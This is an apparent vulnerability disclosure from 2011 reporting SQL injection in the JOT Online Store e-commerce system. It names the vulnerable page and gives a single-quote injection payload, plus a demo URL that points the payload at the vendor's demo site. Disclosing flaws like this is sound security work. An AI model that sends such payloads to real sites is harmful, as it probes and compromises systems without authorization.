JOT Online Store suffers from a remote SQL injection vulnerability.
5ff4ed0e54a45f54f2ce1f94cc53db611cc510171a6cff4c1bc05448b44360b2
# Exploit Title: JOT Online Store (E-Commerce System) SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Software Link: http://www.justonlinetoday.com
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
SQL Injection can be done using the command input
Vulnerable Page:
index.php
Example:
index.php/<SQL Injection Code>
Exploit:
index.php/1'
Demo:
http://www.justonlinetoday.com/demo_online_store/themes/2/index.php/1%27
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
http://www.eyupcelik.com.tr